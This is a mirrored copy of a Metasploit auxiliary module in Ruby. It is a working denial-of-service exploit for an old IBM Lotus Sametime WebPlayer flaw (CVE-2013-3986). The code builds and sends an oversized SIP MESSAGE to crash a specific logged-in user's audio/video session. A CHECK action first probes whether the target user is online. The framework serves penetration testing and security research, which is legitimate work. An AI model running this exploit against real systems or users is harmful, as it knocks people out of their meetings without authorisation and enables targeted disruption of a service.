Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'IBM Lotus Sametime WebPlayer DoS',

15
        'Description' => %q{

16
          This module exploits a known flaw in the IBM Lotus Sametime WebPlayer

17
          version 8.5.2.1392 (and prior) to cause a denial of service condition

18
          against specific users. For this module to function the target user

19
          must be actively logged into the IBM Lotus Sametime server and have

20
          the Sametime Audio Visual browser plug-in (WebPlayer) loaded as a

21
          browser extension. The user should have the WebPlayer plug-in active

22
          (i.e. be in a Sametime Audio/Video meeting for this DoS to work correctly.

23
        },

24
        'Author' => [

25
          'Chris John Riley', # Vulnerability discovery

26
          'kicks4kittens' # Metasploit module

27
        ],

28
        'License' => MSF_LICENSE,

29
        'Actions' => [

30
          [

31
            'DOS',

32
            {

33
              'Description' => 'Cause a Denial Of Service condition against a connected user'

34
            }

35
          ],

36
          [

37
            'CHECK',

38
            {

39
              'Description' => 'Checking if targeted user is online'

40
            }

41
          ]

42
        ],

43
        'DefaultAction' => 'DOS',

44
        'References' => [

45
          [ 'CVE', '2013-3986' ],

46
          [ 'OSVDB', '99552' ],

47
          [ 'BID', '63611'],

48
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21654041' ],

49
          [ 'URL', 'http://xforce.iss.net/xforce/xfdb/84969' ]

50
        ],

51
        'DisclosureDate' => '2013-11-07',

52
        'Notes' => {

53
          'Stability' => [CRASH_SERVICE_DOWN],

54
          'SideEffects' => [],

55
          'Reliability' => []

56
        }

57
      )

58
    )

59


60
    register_options(

61
      [

62
        Opt::RPORT(5060),

63
        OptAddress.new('RHOST', [true, 'The Sametime Media Server']),

64
        OptString.new('SIPURI', [

65
          true,

66
          'The SIP URI of the user to be targeted',

67
          '<target_email_address>@<sametime_media_server_FQDN>'

68
        ]),

69
        OptInt.new('TIMEOUT', [ true, 'Set specific response timeout', 0])

70
      ]

71
    )

72
  end

73


74
  def setup

75
    # cleanup SIP target to ensure it's in the correct format to use

76
    @sipuri = datastore['SIPURI']

77
    if @sipuri[0, 4].downcase == 'sip:'

78
      # remove sip: if present in string

79
      @sipuri = @sipuri[4, @sipuri.length]

80
    end

81
    if @sipuri[0, 12].downcase == 'webavclient-'

82
      # remove WebAVClient- if present in string

83
      @sipuri = @sipuri[12, @sipuri.length]

84
    end

85
  end

86


87
  def run

88
    # inform user of action currently selected

89
    print_status("Action: #{action.name} selected")

90


91
    # CHECK action

92
    if action.name == 'CHECK'

93
      print_status("Checking if user #{@sipuri} is online")

94
      if check_user

95
        print_good('User online')

96
      else

97
        print_status('User offline')

98
      end

99
      return

100
    end

101


102
    # DOS action

103
    print_status("Checking if user #{@sipuri} is online")

104
    check_result = check_user

105


106
    if check_result == false

107
      print_error('User is already offline... Exiting...')

108
      return

109
    end

110


111
    # only proceed if action is DOS the target user is

112
    # online or the CHECKUSER option has been disabled

113
    print_status("Targeting user: #{@sipuri}...")

114
    dos_result = dos_user

115


116
    if dos_result

117
      print_good('User is offline, DoS was successful')

118
    else

119
      print_error('User is still online')

120
    end

121
  end

122


123
  def dos_user

124
    length = 12000 # enough to overflow the end of allocated memory

125
    msg = create_message(length)

126
    res = send_msg(msg)

127


128
    if res.nil?

129
      vprint_good("User #{@sipuri} is no responding")

130
      return true

131
    elsif res =~ /430 Flow Failed/i

132
      vprint_good('DoS packet successful. Response received (430 Flow Failed)')

133
      vprint_good("User #{@sipuri} is no longer responding")

134
      return true

135
    elsif res =~ /404 Not Found/i

136
      vprint_error('DoS packet appears successful. Response received (404 Not Found)')

137
      vprint_status('User appears to be currently offline or not in a Sametime video session')

138
      return true

139
    elsif res =~ /200 OK/i

140
      vrint_error("#{peer} - DoS packet unsuccessful. Response received (200)")

141
      vrint_status("#{peer} - Check user is running an effected version of IBM Lotus Sametime WebPlayer")

142
      return false

143
    else

144
      vprint_status('Unexpected response')

145
      return true

146
    end

147
  end

148


149
  # used to check the user is logged into Sametime and after DoS to check success

150
  def check_user

151
    length = Rex::Text.rand_text_numeric(2) # just enough to check response

152
    msg = create_message(length)

153
    res = send_msg(msg)

154


155
    # check response for current user status - common return codes

156
    if res.nil?

157
      vprint_error('No response')

158
      return false

159
    elsif res =~ /430 Flow Failed/i

160
      vprint_good("User #{@sipuri} is no longer responding (already DoS'd?)")

161
      return false

162
    elsif res =~ /404 Not Found/i

163
      vprint_error("User #{@sipuri} is currently offline or not in a Sametime video session")

164
      return false

165
    elsif res =~ /200 OK/i

166
      vprint_good("User #{@sipuri} is online")

167
      return true

168
    else

169
      vprint_error('Unknown server response')

170
      return false

171
    end

172
  end

173


174
  def create_message(length)

175
    # create SIP MESSAGE of specified length

176
    vprint_status("Creating SIP MESSAGE packet #{length} bytes long")

177


178
    source_user = Rex::Text.rand_text_alphanumeric(1..8)

179
    source_host = Rex::Socket.source_address(datastore['RHOST'])

180
    src = "#{source_host}:#{datastore['RPORT']}"

181
    cseq = Rex::Text.rand_text_numeric(3)

182
    message_text = Rex::Text.rand_text_alphanumeric(length.to_i)

183
    branch = Rex::Text.rand_text_alphanumeric(7)

184


185
    # setup SIP message in the correct format expected by the server

186
    data = "MESSAGE sip:WebAVClient-#{@sipuri} SIP/2.0" + "\r\n"

187
    data << "Via: SIP/2.0/TCP #{src};branch=#{branch}.#{'%.8x' % rand(0x100000000)};rport;alias" + "\r\n"

188
    data << "Max-Forwards: 80\r\n"

189
    data << "To: sip:WebAVClient-#{@sipuri}" + "\r\n"

190
    data << "From: sip:#{source_user}@#{src};tag=70c00e8c" + "\r\n"

191
    data << "Call-ID: #{rand(0x100000000)}@#{source_host}" + "\r\n"

192
    data << "CSeq: #{cseq} MESSAGE" + "\r\n"

193
    data << 'Content-Type: text/plain;charset=utf-8' + "\r\n"

194
    data << "User-Agent: #{source_user}\r\n"

195
    data << "Content-Length: #{message_text.length}" + "\r\n\r\n"

196
    data << message_text

197


198
    return data

199
  end

200


201
  def timing_get_once(sock, length)

202
    timeout = datastore['TIMEOUT']

203
    if timeout && timeout > 0

204
      return sock.get_once(length, timeout)

205
    else

206
      return sock.get_once(length)

207
    end

208
  end

209


210
  def send_msg(msg)

211
    s = connect

212
    # send message and store response

213
    begin

214
      s.put(msg + "\r\n\r\n")

215
    rescue StandardError

216
      nil

217
    end

218
    # read response

219
    res = timing_get_once(s, 25)

220
    if res == "\r\n"

221
      # retry request

222
      res = timing_get_once(s, 25)

223
    end

224
    return res

225
  rescue ::Rex::ConnectionRefused

226
    print_status('Unable to connect')

227
    return nil

228
  rescue ::Errno::ECONNRESET

229
    print_good('DoS packet successful, host not responding.')

230
    return nil

231
  rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

232
    print_status("Couldn't connect")

233
    return nil

234
  ensure

235
    # disconnect socket if still open

236
    disconnect if s

237
  end

238
end

239


240